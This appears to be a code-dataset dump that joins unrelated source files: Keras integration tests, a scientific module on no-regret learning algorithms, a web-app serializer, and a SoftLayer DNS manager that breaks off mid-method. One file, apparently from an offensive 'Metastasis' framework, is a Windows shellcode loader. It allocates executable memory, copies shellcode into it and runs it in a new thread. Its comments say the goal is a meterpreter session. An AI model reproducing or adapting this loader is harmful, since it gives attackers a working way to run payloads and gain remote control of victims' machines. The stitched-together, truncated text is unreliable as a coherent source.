def test_timeseries_classification_sequential_tf_rnn(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(4, 10),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(keras.layers.RNN(rnn_cell.LSTMCell(5), return_sequences=True,
input_shape=x_train.shape[1:]))
model.add(keras.layers.RNN(rnn_cell.GRUCell(y_train.shape[-1],
activation='softmax',
dtype=dtypes.float32)))
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=15, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class ImageClassificationIntegrationTest(keras_parameterized.TestCase):
def test_image_classification(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10, 10, 3),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
layers = [
keras.layers.Conv2D(4, 3, padding='same', activation='relu'),
keras.layers.Conv2D(8, 3, padding='same'),
keras.layers.BatchNormalization(),
keras.layers.Conv2D(8, 3, padding='same'),
keras.layers.Flatten(),
keras.layers.Dense(y_train.shape[-1], activation='softmax')
]
model = testing_utils.get_model_from_layers(
layers, input_shape=x_train.shape[1:])
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
history = model.fit(x_train, y_train, epochs=10, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
self.assertGreater(history.history['val_acc'][-1], 0.7)
_, val_acc = model.evaluate(x_train, y_train)
self.assertAlmostEqual(history.history['val_acc'][-1], val_acc)
predictions = model.predict(x_train)
self.assertEqual(predictions.shape, (x_train.shape[0], 2))
@keras_parameterized.run_all_keras_modes
class ActivationV2IntegrationTest(keras_parameterized.TestCase):
"""Tests activation function V2 in model exporting and loading.
This test is to verify in TF 2.x, when 'tf.nn.softmax' is used as an
activition function, its model exporting and loading work as expected.
Check b/123041942 for details.
"""
def test_serialization_v2_model(self):
np.random.seed(1337)
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=0,
input_shape=(10,),
num_classes=2)
y_train = keras.utils.to_categorical(y_train)
model = keras.Sequential([
keras.layers.Flatten(input_shape=x_train.shape[1:]),
keras.layers.Dense(10, activation=nn.relu),
# To mimic 'tf.nn.softmax' used in TF 2.x.
keras.layers.Dense(y_train.shape[-1], activation=nn.softmax_v2),
])
# Check if 'softmax' is in model.get_config().
last_layer_activation = model.get_layer(index=2).get_config()['activation']
self.assertEqual(last_layer_activation, 'softmax')
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizer_v2.adam.Adam(0.005),
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
model.fit(x_train, y_train, epochs=2, batch_size=10,
validation_data=(x_train, y_train),
verbose=2)
output_path = keras.saving.saved_model.export(
model, os.path.join(self.get_temp_dir(), 'tf_keras_saved_model'))
loaded_model = keras.saving.saved_model.load_from_saved_model(output_path)
self.assertEqual(model.summary(), loaded_model.summary())
if __name__ == '__main__':
test.main()
| apache-2.0 | 8,766,601,696,139,803,000 | 40.971545 | 80 | 0.637385 | false |
Disguisenberg/Metastasis-Framework | template/template.py | 1 | 2293 | import ctypes
# ctypes makes it very simple to interact with the Windows API in a python script,so it will be a required import for this script. It provides C compatible data types and allows calling functions in DLLs or shared libraries
shellcode = (
);
# Shellcode - This is the shellcode that will be injected into memory and then execute it which will grant us a juide ssl certified meterpreter session
# We will be using 4 Win32 APIs, to execute the shellcode, these APIs are very important in dynamic memory management on Windows Platforms
ptr = ctypes.windll.kernel32.VirtualAlloc(0,4096,ctypes.c_int(0x1000),ctypes.c_int(0x40))
# First VirtualAlloc() function will allow us to create a new executable memory region and copy our shellcode to it and after that execute it
b = bytearray() # Store b as bytearray() so our shellcode in Python3 won't be used as bytes but bytecode
b.extend(map(ord, shellcode))
buf = (ctypes.c_char * len(shellcode)).from_buffer(b)
# Buffer pool constructs an array that consists the size of our shellcode
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# RtlMoveMemory() function accepts 3 arguments, a pointer to the destination (returned from VirtualAlloc()), a pointer to the memory to be copied and the number of bytes to be copied,in our case the size of the shellcode
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# CreateThread() accepts 6 arguments in our case the third argument is very important, we need to pass a pointer to the application -defined function to be executed by the thread returned by VirtualAlloc() if the function succeds,the return value is a handle to the new thread.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)))
# WaitForSingleObject() function accepts 2 arguments, the first one is the handle to the object (returned by CreateThread()) and the time-o
| mit | 2,696,099,267,623,453,000 | 90.72 | 277 | 0.685565 | false |
renalreg/radar | radar/api/serializers/group_users.py | 1 | 2305 | from cornflake import fields
from cornflake.exceptions import ValidationError
from cornflake.sqlalchemy_orm import ModelSerializer
from radar.api.serializers.common import (
EnumLookupField,
GroupField,
MetaMixin,
StringLookupField,
UserMixin,
)
from radar.exceptions import PermissionDenied
from radar.models.groups import GroupUser
from radar.permissions import has_permission_for_group_role
from radar.roles import ROLE, ROLE_NAMES
class GroupUserSerializer(UserMixin, MetaMixin, ModelSerializer):
group = GroupField()
role = EnumLookupField(ROLE, ROLE_NAMES)
permissions = fields.ListField(child=fields.StringField(), read_only=True)
managed_roles = fields.ListField(child=StringLookupField(ROLE_NAMES), read_only=True)
class Meta(object):
model_class = GroupUser
exclude = ['group_id']
def check_permissions(self, user, group, role):
current_user = self.context['user']
# Can't change your own role
if current_user == user and not current_user.is_admin:
raise PermissionDenied()
# Check the user has permission for the group and role
if not has_permission_for_group_role(current_user, group, role):
raise PermissionDenied()
def is_duplicate(self, data):
group = data['group']
user = data['user']
role = data['role']
instance = self.instance
duplicate = any(
group == x.group and
role == x.role and
(instance is None or instance != x)
for x in user.group_users
)
return duplicate
def validate(self, data):
data = super(GroupUserSerializer, self).validate(data)
instance = self.instance
# Updating existing record
if instance is not None:
self.check_permissions(instance.user, instance.group, instance.role)
self.check_permissions(data['user'], data['group'], data['role'])
# Check that the user doesn't already belong to this group
# Note: it's important this check happens after the above permission check to prevent membership enumeration
if self.is_duplicate(data):
raise ValidationError({'group': 'User already belongs to this group.'})
return data
| agpl-3.0 | -7,541,290,508,817,129,000 | 31.928571 | 116 | 0.667245 | false |
Balandat/cont_no_regret | ContNoRegret/NoRegretAlgos.py | 1 | 23992 | '''
Basic Algorithms for the Continuous No-Regret Problem.
@author: Maximilian Balandat
@date May 25, 2015
'''
import numpy as np
from .LossFunctions import ZeroLossFunction, ctypes_integrate
from .DualAveraging import compute_nustar
from .Domains import nBox, UnionOfDisjointnBoxes, DifferenceOfnBoxes
from .Potentials import ExponentialPotential, pExpPotential
from scipy.stats import linregress
class ContNoRegretProblem(object):
""" Basic class describing a Continuous No-Regret problem. """
def __init__(self, domain, lossfuncs, L, M, desc='nodesc'):
""" Constructor for the basic problem class. Here lossfuncs
is a list of loss LossFunction objects. """
self.domain, self.L, self.M = domain, L, M
self.lossfuncs = lossfuncs
self.T = len(lossfuncs)
self.optaction, self.optval = None, None
self.desc = desc
if domain.n == 2:
if isinstance(domain, nBox):
self.pltpoints = [domain.grid(2000)]
elif isinstance(domain, UnionOfDisjointnBoxes):
weights = np.array([nbox.volume for nbox in domain.nboxes])
self.pltpoints = [nbox.grid(2000*weight/sum(weights)) for nbox,weight in zip(domain.nboxes,weights)]
def cumulative_loss(self, points):
""" Computes the cumulative loss at the given points """
loss = np.zeros((points.shape[0], 1))
for lossfunc in self.lossfuncs:
loss = loss + lossfunc.val(points)
return loss
def create_pltpoints(self, Nplot):
""" Create a number of points used for plotting the evolution of
the density function for the DA algorithm """
if self.domain.n != 2:
return None
if isinstance(self.domain, nBox):
return [self.domain.grid(Nplot)]
elif isinstance(self.domain, UnionOfDisjointnBoxes):
weights = np.array([nbox.volume for nbox in self.domain.nboxes])/self.domain.volume
return [nbox.grid(np.ceil(weight*Nplot)) for nbox,weight in zip(self.domain.nboxes, weights)]
elif isinstance(self.domain, DifferenceOfnBoxes):
if len(self.domain.inner) > 1:
raise Exception('Can only create pltpoints for DifferenceOfnBoxes with single box missing!')
bnds_inner, bnds_outer = self.domain.inner[0].bounds, self.domain.outer.bounds
nboxes = [nBox([bnds_outer[0], [bnds_inner[1][1], bnds_outer[1][1]]]),
nBox([bnds_outer[0], [bnds_outer[1][0], bnds_inner[1][0]]]),
nBox([[bnds_outer[0][0], bnds_inner[0][0]], bnds_inner[1]]),
nBox([[bnds_inner[0][1], bnds_outer[0][1]], bnds_inner[1]])]
weights = np.array([nbox.volume for nbox in nboxes])/self.domain.volume
return [nbox.grid(np.ceil(weight*Nplot)) for nbox,weight in zip(nboxes, weights)]
def run_simulation(self, N, algo, Ngrid=100000, label='nolabel', **kwargs):
""" Runs the no-regret algorithm for different parameters and returns the
results as a 'Result' object. Accepts optimal constant rates in the
dictionary 'etaopts', constant rates in the array-like 'etas', and
time-varying rates with parameters in the array-like 'alphas', 'thetas' """
result_args = {}
if algo == 'Greedy':
regs_Greedy = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
print('Simulating Greedy')
regrets = self.simulate(N, algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(regs_Greedy, regrets)
result_args['regs_{}'.format(algo)] = regs_Greedy
elif algo == 'GP':
regs_GP = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
print('Simulating GP, rate eta_t=t^(-0.5)')
regrets = self.simulate(N, etas=(1+np.arange(self.T))**(-0.5), algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(regs_GP, regrets)
self.regret_bound(regs_GP, algo, alpha=0.5)
result_args['regs_{}'.format(algo)] = regs_GP
elif algo == 'OGD':
regs_OGD = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
theta = 1/kwargs['H']
print('Simulating OGD, rate eta_t={0:.2f}t^(-1)'.format(theta))
regrets = self.simulate(N, etas=theta/(1+np.arange(self.T)), algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(regs_OGD, regrets)
self.regret_bound(regs_OGD, algo, H=kwargs['H'])
result_args['regs_{}'.format(algo)] = regs_OGD
elif algo == 'DA':
pot = kwargs['potential']
reg_info = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
if kwargs.get('opt_rate') == True:
if isinstance(pot, ExponentialPotential):
theta = np.sqrt((pot.c_omega*(self.domain.n-np.log(self.domain.v))
+ pot.d_omega*self.domain.v)/2/self.M**2)
alpha = None
print('Simulating {0}, {1}, opt. rate '.format(algo, pot.desc) +
'eta_t={0:.3f} sqrt(log t/t)'.format(theta))
etas = theta*np.sqrt(np.log(1+np.arange(self.T)+1)/(1+np.arange(self.T)))
elif isinstance(pot, pExpPotential):
try:
M = pot.M
except AttributeError:
M = self.M
theta = np.sqrt((pot.c_omega*(self.domain.n-np.log(self.domain.v))
+ pot.d_omega*self.domain.v)/2/M**2)
alpha = None
print('Simulating {0}, {1}, opt. rate '.format(algo, pot.desc) +
'eta_t={0:.3f} sqrt(log t/t)'.format(theta))
etas = theta*np.sqrt(np.log(1+np.arange(self.T)+1)/(1+np.arange(self.T)))
else:
try:
M = pot.M
except AttributeError:
M = self.M
alpha, theta = pot.alpha_opt(self.domain.n), pot.theta_opt(self.domain, M)
print('Simulating {0}, {1}, opt. rate '.format(algo, pot.desc) +
'eta_t={0:.3f}t^(-{1:.3f})$'.format(theta, alpha))
etas = theta*(1+np.arange(self.T))**(-alpha)
regrets = self.simulate(N, etas=etas, algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(reg_info, regrets)
self.regret_bound(reg_info, algo, alpha=alpha, theta=theta, potential=pot)
result_args['regs_DAopt'] = reg_info
if 'etas' in kwargs:
print('Simulating {0}, {1}, custom rate'.format(algo, pot.desc))
regrets = self.simulate(N, algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(reg_info, regrets)
# self.regret_bound(reg_info, algo, alpha=alpha, theta=theta, potential=pot)
result_args['regs_DAetas'] = reg_info
if kwargs.get('animate') is not None:
result_args['pltdata'] = kwargs.get('animate')
if kwargs.get('KL') is not None:
result_args['KL'] = kwargs.get('KL')
# if 'etaopts' in kwargs:
# regs_etaopts = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
# 'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
# for T,eta in kwargs['etaopts'].items():
# if algo == 'DA':
# print('Simulating {0}, {1}, opt. constant rate eta_t={2:.3f}'.format(algo, pot.desc, eta))
# else:
# print('Simulating {0}, opt. constant rate eta_t={1:.3f}'.format(algo, eta))
# regrets = self.simulate(N, etas=eta*np.ones(self.T), algo=algo, Ngrid=Ngrid, **kwargs)[2]
# self.parse_regrets(regs_etaopts, regrets)
# result_args['regs_etaopts'] = regs_etaopts
# if 'etas' in kwargs:
# regs_etas = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
# 'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
# for eta in kwargs['etas']:
# if algo == 'DA':
# print('Simulating {0}, {1}, constant rate eta={2:.3f}'.format(algo, kwargs['potential'].desc, eta))
# else:
# print('Simulating {0}, constant rate eta={1:.3f}'.format(algo, eta))
# regrets = self.simulate(N, etas=eta*np.ones(self.T), algo=algo, Ngrid=Ngrid, **kwargs)[2]
# self.parse_regrets(regs_etas, regrets)
# result_args['etas'] = kwargs['etas']
# result_args['regs_etas'] = regs_etas
# if 'alphas' in kwargs:
# regs_alphas = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
# 'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
# for alpha,theta in zip(kwargs['alphas'], kwargs['thetas']): # run for Nloss different sequences of loss functions
# if algo == 'DA':
# print('Simulating {0}, {1}, decaying rate with alpha={2:.3f}, theta={3}'.format(algo, kwargs['potential'].desc, alpha, theta))
# else:
# print('Simulating {0}, decaying rate with alpha={1:.3f}, theta={2}'.format(algo, alpha, theta))
# regrets = self.simulate(N, etas=theta*(1+np.arange(self.T))**(-alpha), algo=algo, Ngrid=Ngrid, **kwargs)[2]
# self.parse_regrets(regs_alphas, regrets)
# self.regret_bound(regs_alphas, algo, alpha=alpha, theta=theta, potential=kwargs['potential'])
# result_args['alphas'] = kwargs['alphas']
# result_args['thetas'] = kwargs['thetas']
# result_args['regs_alphas'] = regs_alphas
else:
regs_norate = {'savg':[], 'tsavg':[], 'tsavgbnd':[], 'perc_10':[],
'perc_90':[], 'tavg_perc_10':[], 'tavg_perc_90':[]}
print('Simulating {0}, exp-concavity parameter alpha={1:.3f}'.format(algo, kwargs['alpha']))
regrets = self.simulate(N, algo=algo, Ngrid=Ngrid, **kwargs)[2]
self.parse_regrets(regs_norate, regrets)
self.regret_bound(regs_norate, algo, **kwargs)
result_args['regs_{}'.format(algo)] = regs_norate
# write the results to file (save memory) and return the file handler
results = Results(self, label=label, algo=algo, **result_args)
return results
def simulate(self, N, algo='DA', Ngrid=200000, **kwargs):
""" Simulates the result of running the No-Regret algorithm (N times).
Returns a list of sequences of decisions and associated losses, one for each run.
The grid is used for computing both the regret and the actions! """
if algo in ['DA', 'GP', 'OGD']:
etas = kwargs.get('etas')
if algo == 'DA':
pot = kwargs['potential']
if algo in ['ONS', 'FTAL', 'EWOO']:
alpha = kwargs['alpha']
beta = 0.5*np.minimum(1/4/self.L/self.domain.diameter, alpha)
epsilon = 1/beta**2/self.domain.diameter**2
# set up some data structures for keeping record
actions, losses, cumloss, regrets = [], [], [], []
gridpoints = self.domain.grid(Ngrid)
approxL = np.zeros(gridpoints.shape[0])
cumLossFunc = ZeroLossFunction(self.domain)
# now run the iterations
for t, lossfunc in enumerate(self.lossfuncs):
if t == 0:
print('pid {}: Starting...'.format(kwargs['pid']))
elif t % 25 == 0:
print('pid {}: t={}'.format(kwargs['pid'], t))
if algo == 'Greedy':
if t == 0:
action = self.domain.sample_uniform(N)
else:
action = np.array([cumLossFunc.min(argmin=True)[1],]*N)
if algo in ['GP', 'OGD']: # GP and OGD are the same except for the rates
if t == 0:
action = self.domain.sample_uniform(N) # pick arbitrary action in the first step, may as well sample
else:
action = self.lossfuncs[t-1].proj_gradient(actions[-1], etas[t]) # do the projected gradient step
elif algo == 'DA': # Our very own Dual Averaging algorithm
if t == 0:
# compute nustar for warm-starting the intervals of root-finder
nustar = -1/etas[t]*pot.phi_inv(1/self.domain.volume)
action = self.domain.sample_uniform(N)
if kwargs.get('KL') is not None:
kwargs.get('KL').append(0)
else:
nustar = compute_nustar(self.domain, pot, etas[t], cumLossFunc, self.M, nustar,
etas[t-1], t, pid=kwargs['pid'], tmpfolder=kwargs['tmpfolder'], KL=kwargs.get('KL'))
weights = np.maximum(pot.phi(-etas[t]*(approxL + nustar)), 0)
np.random.seed()
action = gridpoints[np.random.choice(weights.shape[0], size=N, p=weights/np.sum(weights))]
del weights
if kwargs.get('animate') is not None:
kwargs.get('animate').append([np.maximum(pot.phi(-etas[t]*(cumLossFunc.val(pltpoints) + nustar)), 0)
for pltpoints in self.pltpoints])
elif algo == 'ONS': # Hazan's Online Newton Step
if t == 0:
action = self.domain.sample_uniform(N) # pick arbitrary action in the first step, may as well sample
grad = lossfunc.grad(action)
A = np.einsum('ij...,i...->ij...', grad, grad) + epsilon*np.array([np.eye(self.domain.n),]*N)
Ainv = np.array([np.linalg.inv(mat) for mat in A])
else:
points = actions[-1] - np.einsum('ijk...,ik...->ij...', Ainv, grad)/beta
action = self.domain.gen_project(points, A)
grad = lossfunc.grad(action)
A = A + np.einsum('ij...,i...->ij...', grad, grad)
z = np.einsum('ijk...,ik...->ij...', Ainv, grad)
Ainv = Ainv - np.einsum('ij...,i...->ij...', z, z)/(1 + np.einsum('ij,ij->i',grad,z))[:,np.newaxis,np.newaxis]
elif algo == 'FTAL':
if t == 0:
action = self.domain.sample_uniform(N) # pick arbitrary action in the first step, may as well sample
grad = lossfunc.grad(action)
A = np.einsum('ij...,i...->ij...', grad, grad)
b = grad*(np.einsum('ij,ij->i', grad, action) - 1/beta)[:,np.newaxis]
Ainv = np.array([np.linalg.pinv(mat) for mat in A]) # so these matrices are singular... what's the issue?
else:
points = np.einsum('ijk...,ik...->ij...', Ainv, b)
action = self.domain.gen_project(points, A)
grad = lossfunc.grad(action)
A = A + np.einsum('ij...,i...->ij...', grad, grad)
b = b + grad*(np.einsum('ij,ij->i', grad, action) - 1/beta)[:,np.newaxis]
# the following uses the matrix inversion lemma for
# efficient computation the update of Ainv
z = np.einsum('ijk...,ik...->ij...', Ainv, grad)
Ainv = Ainv - np.einsum('ij...,i...->ij...', z, z)/(1 + np.einsum('ij,ij->i',grad,z))[:,np.newaxis,np.newaxis]
elif algo == 'EWOO':
if t == 0:
if not self.domain.isconvex():
raise Exception('EWOO algorithm only makes sense if the domain is convex!')
action = self.domain.sample_uniform(N)
else:
if isinstance(self.domain, nBox):
ranges = [self.domain.bounds]
elif isinstance(self.domain, UnionOfDisjointnBoxes):
ranges = [nbox.bounds for nbox in self.domain.nboxes]
else:
raise Exception('For now, domain must be an nBox or a UnionOfDisjointnBoxes!')
action_ewoo = action_EWOO(cumLossFunc, alpha, ranges, tmpfolder=kwargs['tmpfolder'])
action = np.array([action_ewoo,]*N)
# now store the actions, losses, etc.
actions.append(action)
loss = lossfunc.val(action)
losses.append(loss)
if t == 0:
cumloss.append(loss)
cumLossFunc = lossfunc
else:
cumloss.append(cumloss[-1] + loss)
cumLossFunc = cumLossFunc + lossfunc
# compute and append regret
approxL += lossfunc.val(gridpoints)
optval = cumLossFunc.min()
regrets.append(cumloss[-1] - optval)
return np.transpose(np.array(actions), (1,0,2)), np.transpose(np.array(losses)), np.transpose(np.array(regrets))
def parse_regrets(self, reg_results, regrets):
""" Function that computes some aggregate information from the
raw regret samples in the list 'regrets' """
reg_results['savg'].append(np.average(regrets, axis=0))
reg_results['perc_10'].append(np.percentile(regrets, 10, axis=0))
reg_results['perc_90'].append(np.percentile(regrets, 90, axis=0))
reg_results['tsavg'].append(reg_results['savg'][-1]/(1+np.arange(self.T)))
reg_results['tavg_perc_10'].append(reg_results['perc_10'][-1]/(1+np.arange(self.T)))
reg_results['tavg_perc_90'].append(reg_results['perc_90'][-1]/(1+np.arange(self.T)))
return reg_results
def regret_bound(self, reg_results, algo, **kwargs):
""" Computes the regret bound for the ContNoRegret Problem. """
t = 1 + np.arange(self.T)
n, D, L = self.domain.n, self.domain.diameter, self.L
if algo == 'DA':
pot, v = kwargs['potential'], self.domain.v
if 'etas' in kwargs:
etas = kwargs['etas']
raise NotImplementedError('Need to implement general bound in terms of etas')
else:
if (isinstance(pot, ExponentialPotential) or isinstance(pot, pExpPotential)):
reg_bnd = self.M*np.sqrt(8*(pot.c_omega*(n-np.log(v)) + pot.d_omega*v))*np.sqrt(np.log(t+1)/t) + L*D/t
else:
alpha, theta = kwargs['alpha'], kwargs['theta']
lpsi = pot.l_psi()[0]
C, epsilon = pot.bounds_asymp()
try:
M = pot.M
except AttributeError:
M = self.M
reg_bnd = (M**2*theta/lpsi/(1-alpha)*t**(-alpha)
+ (L*D + C/theta*v**(-epsilon))*t**(-(1-alpha)/(1+n*epsilon)))
elif algo == 'GP':
# for now assume eta_t = t**(-0.5)
reg_bnd = (D**2/2 + L**2)*t**(-0.5) - L**2/2/t
elif algo == 'OGD':
reg_bnd = L**2/2/kwargs['H']*(1+np.log(t))/t
elif algo == 'ONS':
reg_bnd = 5*(1/kwargs['alpha'] + L*D)*n*np.log(t+1)/t
elif algo == 'FTAL':
reg_bnd = 64*(1/kwargs['alpha'] + L*D)*n*(1+np.log(t))/t
elif algo == 'EWOO':
reg_bnd = 1/kwargs['alpha']*n*(1+np.log(t+1))/t
else:
raise NotImplementedError
reg_results['tsavgbnd'].append(reg_bnd)
class Results(object):
""" Class for 'result' objects that contain simulation results
generated by ContNoRegretProblems """
def __init__(self, problem, **kwargs):
self.problem = problem #, self.regs = problem, regs
self.label = kwargs.get('label')
self.algo = kwargs.get('algo')
if kwargs.get('pltdata') is not None:
self.pltdata = kwargs.get('pltdata')
if kwargs.get('KL') is not None:
self.KL = kwargs.get('KL')
if 'etas' in kwargs:
self.etas = kwargs['etas']
if self.algo == 'DA':
try: self.regs_norate = kwargs['regs_DAopt']
except: KeyError
try: self.regs_norate = kwargs['regs_DAetas']
except: KeyError
try: self.etaopts, self.regs_etaopts = kwargs['etaopts'], kwargs['regs_etaopts']
except KeyError: pass
try: self.etas, self.regs_etas = kwargs['etas'], kwargs['regs_etas']
except KeyError: pass
try: self.alphas, self.thetas, self.regs_alphas = kwargs['alphas'], kwargs['thetas'], kwargs['regs_alphas']
except KeyError: pass
else:
self.regs_norate = kwargs['regs_{}'.format(self.algo)]
Nslopes = np.minimum(1000, np.floor(self.problem.T/3))
self.slopes, self.slopes_bnd = self.estimate_loglog_slopes(Nslopes)
def estimate_loglog_slopes(self, N=500):
""" Estimates slopes of the asymptotic log-log plot
for each element f tsavg_regert, using the N last data points """
slopes, slopes_bnd = {}, {}
try:
slopes['etaopts'] = self.loglog_slopes(self.regs_etaopts['tsavg'], N)
slopes_bnd['etaopts'] = self.loglog_slopes(self.regs_etaopts['tsavgbnd'], N)
except AttributeError: pass
try:
slopes['etas'] = self.loglog_slopes(self.regs_etas['tsavg'], N)
slopes_bnd['etas'] = self.loglog_slopes(self.regs_etas['tsavgbnd'], N)
except AttributeError: pass
try:
slopes['alphas'] = self.loglog_slopes(self.regs_alphas['tsavg'], N)
slopes_bnd['alphas'] = self.loglog_slopes(self.regs_alphas['tsavgbnd'], N)
except AttributeError: pass
try:
slopes['{}'.format(self.algo)] = self.loglog_slopes(self.regs_norate['tsavg'], N)
slopes_bnd['{}'.format(self.algo)] = self.loglog_slopes(self.regs_norate['tsavgbnd'], N)
except AttributeError: pass
return slopes, slopes_bnd
def loglog_slopes(self, regrets, N):
slopes = []
for regret in regrets:
T = np.arange(len(regret)-N, len(regret))
Y = regret[len(regret)-N:]
slope = linregress(np.log(T), np.log(Y))[0]
slopes.append(slope)
return slopes
def action_EWOO(cumLossFunc, alpha, ranges, tmpfolder='libs/'):
""" Function for computing the (single) action of the EWOO algorithm """
header = ['#include <math.h>\n\n',
'double alpha = {};\n'.format(alpha)]
func = cumLossFunc.gen_ccode()
ccode = header + func + [' return exp(-alpha*loss);\n',
' }']
integr = ctypes_integrate(ccode, ranges, tmpfolder)
actions = []
for i in range(cumLossFunc.domain.n):
footer = [' return args[{}]*exp(-alpha*loss);\n'.format(i),
' }']
ccode = header + func + footer
actions.append(ctypes_integrate(ccode, ranges, tmpfolder)/integr)
return np.array(actions)
| mit | -6,658,337,883,254,105,000 | 55.056075 | 152 | 0.520007 | false |
kyubifire/softlayer-python | SoftLayer/managers/dns.py | 1 | 8207 | """
SoftLayer.dns
~~~~~~~~~~~~~
DNS Manager/helpers
:license: MIT, see LICENSE for more details.
"""
import time
from SoftLayer import utils
class DNSManager(utils.IdentifierMixin, object):
"""Manage SoftLayer DNS.
See product information here: http://www.softlayer.com/DOMAIN-SERVICES
:param SoftLayer.API.BaseClient client: the client instance
"""
def __init__(self, client):
self.client = client
self.service = self.client['Dns_Domain']
self.record = self.client['Dns_Domain_ResourceRecord']
self.resolvers = [self._get_zone_id_from_name]
def _get_zone_id_from_name(self, name):
"""Return zone ID based on a zone."""
results = self.client['Account'].getDomains(
filter={"domains": {"name": utils.query_filter(name)}})
return [x['id'] for x in results]
def list_zones(self, **kwargs):
"""Retrieve a list of all DNS zones.
:param dict \\*\\*kwargs: response-level options (mask, limit, etc.)
:returns: A list of dictionaries representing the matching zones.
"""
return self.client['Account'].getDomains(**kwargs)
def get_zone(self, zone_id, records=True):
"""Get a zone and its records.
:param zone: the zone name
:returns: A dictionary containing a large amount of information about
the specified zone.
"""
mask = None
if records:
mask = 'resourceRecords'
return self.service.getObject(id=zone_id, mask=mask)
def create_zone(self, zone, serial=None):
"""Create a zone for the specified zone.
:param zone: the zone name to create
:param serial: serial value on the zone (default: strftime(%Y%m%d01))
"""
return self.service.createObject({
'name': zone,
'serial': serial or time.strftime('%Y%m%d01'),
"resourceRecords": {}})
def delete_zone(self, zone_id):
"""Delete a zone by its ID.
:param integer zone_id: the zone ID to delete
"""
return self.service.deleteObject(id=zone_id)
def edit_zone(self, zone):
"""Update an existing zone with the options provided.
The provided dict must include an 'id' key and value corresponding
to the zone that should be updated.
:param dict zone: the zone to update
"""
self.service.editObject(zone)
def create_record(self, zone_id, record, record_type, data, ttl=60):
"""Create a resource record on a domain.
:param integer id: the zone's ID
:param record: the name of the record to add
:param record_type: the type of record (A, AAAA, CNAME, TXT, etc.)
:param data: the record's value
:param integer ttl: the TTL or time-to-live value (default: 60)
"""
resource_record = self._generate_create_dict(record, record_type, data,
ttl, domainId=zone_id)
return self.record.createObject(resource_record)
def create_record_mx(self, zone_id, record, data, ttl=60, priority=10):
"""Create a mx resource record on a domain.
:param integer id: the zone's ID
:param record: the name of the record to add
:param data: the record's value
:param integer ttl: the TTL or time-to-live value (default: 60)
:param integer priority: the priority of the target host
"""
resource_record = self._generate_create_dict(record, 'MX', data, ttl,
domainId=zone_id, mxPriority=priority)
return self.record.createObject(resource_record)
def create_record_srv(self, zone_id, record, data, protocol, port, service,
ttl=60, priority=20, weight=10):
"""Create a resource record on a domain.
:param integer id: the zone's ID
:param record: the name of the record to add
:param data: the record's value
:param string protocol: the protocol of the service, usually either TCP or UDP.
:param integer port: the TCP or UDP port on which the service is to be found.
:param string service: the symbolic name of the desired service.
:param integer ttl: the TTL or time-to-live value (default: 60)
:param integer priority: the priority of the target host (default: 20)
:param integer weight: relative weight for records with same priority (default: 10)
"""
resource_record = self._generate_create_dict(record, 'SRV', data, ttl, domainId=zone_id,
priority=priority, protocol=protocol, port=port,
service=service, weight=weight)
# The createObject won't creates SRV records unless we send the following complexType.
resource_record['complexType'] = 'SoftLayer_Dns_Domain_ResourceRecord_SrvType'
return self.record.createObject(resource_record)
def create_record_ptr(self, record, data, ttl=60):
"""Create a reverse record.
:param record: the public ip address of device for which you would like to manage reverse DNS.
:param data: the record's value
:param integer ttl: the TTL or time-to-live value (default: 60)
"""
resource_record = self._generate_create_dict(record, 'PTR', data, ttl)
return self.record.createObject(resource_record)
@staticmethod
def _generate_create_dict(record, record_type, data, ttl, **kwargs):
"""Returns a dict appropriate to pass into Dns_Domain_ResourceRecord::createObject"""
# Basic dns record structure
resource_record = {
'host': record,
'data': data,
'ttl': ttl,
'type': record_type
}
for (key, value) in kwargs.items():
resource_record.setdefault(key, value)
return resource_record
def delete_record(self, record_id):
